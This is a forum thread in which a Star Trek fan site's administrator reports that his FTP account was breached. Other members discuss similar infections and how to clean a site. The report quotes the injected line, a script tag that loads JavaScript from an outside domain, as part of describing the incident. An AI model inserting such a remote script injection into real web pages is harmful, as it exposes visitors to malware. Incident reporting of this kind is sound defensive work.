Author Topic: Attack on EAS  (Read 4245 times)

Offline Bernd

  • Administrator
  • Distinguished Member
  • Posts: 7,862
  • Lord of the Bored
    • View Profile
Attack on EAS
« on: March 16, 2010, 12:22:04 PM »
On Monday, March 15 someone with the IP address 195.78.108.70 gained illegal access to my FTP account and uploaded the following evil code to the file /index.htm:

<script type="text/javascript" src="http://mys5.org/counter.js"></script>

The domain mys5.org resolves to 195.78.108.70.

As a result, EAS has been found as infected and is currently labeled as "attack site" by Google (you will notice if you are using Firefox).

I have immediately deleted the evil code and checked for possible other infections, I have changed the passwords and filed reports to Google and other organizations in an attempt to restore the reputation of EAS and put an end to this nightmare. The site is clean now.

The attacking site/server has been identified:
http://www.dnstools.com/?count=1&lookup=on&wwwhois=on&arin=on&portNum=80&target=mys5.org&submit=Go!

I am currently uncertain whether the guy running this site hacked EAS, or whether he may be a victim himself. In any case I will further pursue this criminal attack on my site, and I am currently preparing an official complaint with the FBI's IC3 center and a possible lawsuit.

Offline Bernd

  • Administrator
  • Distinguished Member
  • Posts: 7,862
  • Lord of the Bored
    • View Profile
Re: Attack on EAS
« Reply #1 on: March 16, 2010, 02:32:02 PM »
It seems the site has been removed from the blacklist.

If anyone should still encounter problems or find EAS on any blacklist, please inform me.

Offline Hobbes

  • Veteran Member
  • Posts: 2,134
  • Cinnamon! No!
    • View Profile
    • Federation Starship Datalink
Re: Attack on EAS
« Reply #2 on: August 17, 2011, 07:23:37 PM »
I think whatever hit your site has hit mine like the previous thread states.  I've multiple antivirus, malware, and spyware programs on my computer to see if there's anything on my computer. So far it's clean and I don't recall uploading anything recently to explain why my site is blocked.

I don't know how you cleaned your site but anything you can help to fix the problem would appreciated.
"People should not be afraid of their governments. Governments should be afraid of their people."
Federation Starship Datalink

Offline Makaveli

  • Administrator
  • Board Legend
  • Posts: 10,123
  • N.I.G.G.A.
    • View Profile
Re: Attack on EAS
« Reply #3 on: August 18, 2011, 08:06:01 AM »
Honestly I think the easiest way would be to take everything down and reupload the entire site, for you thats probably not as bad as Bernd's site... you can be pretty sure that all files you have on your computer are clean so that should fix everything... but you'd have to delete EVERYTHING from the ftp first, just in case some other file got uploaded that isn't in your site folder...

I had to do something similar back a couple years ago, someone gained access to my ftp and put up a couple of phishing sites... they were deep in the subdirectories so i had no clue they were there, trying to go through and track down every file was a pain in the ass and I could never be sure I got everything so I just wiped everything and reuploaded the files on my computer... was a pain in the ass because I had a messageboard running so I had to fix a ton of things with that.
N.I.G.G.A. - Never Ignorant Gettin' Goals Acomplished
"If a man hasn't discovered something he will die for, he isn't fit to live." - Dr. Martin Luther King Jr.
CIDvision :: the breen war :: trekonline

Offline Hobbes

  • Veteran Member
  • Posts: 2,134
  • Cinnamon! No!
    • View Profile
    • Federation Starship Datalink
Re: Attack on EAS
« Reply #4 on: August 19, 2011, 01:54:55 AM »
True.  Bernd has a lot more content than I do.  He covers all of Star Trek while I focused just on Federation starships.

I may end up having to do just that. Delete and fresh reload.
"People should not be afraid of their governments. Governments should be afraid of their people."
Federation Starship Datalink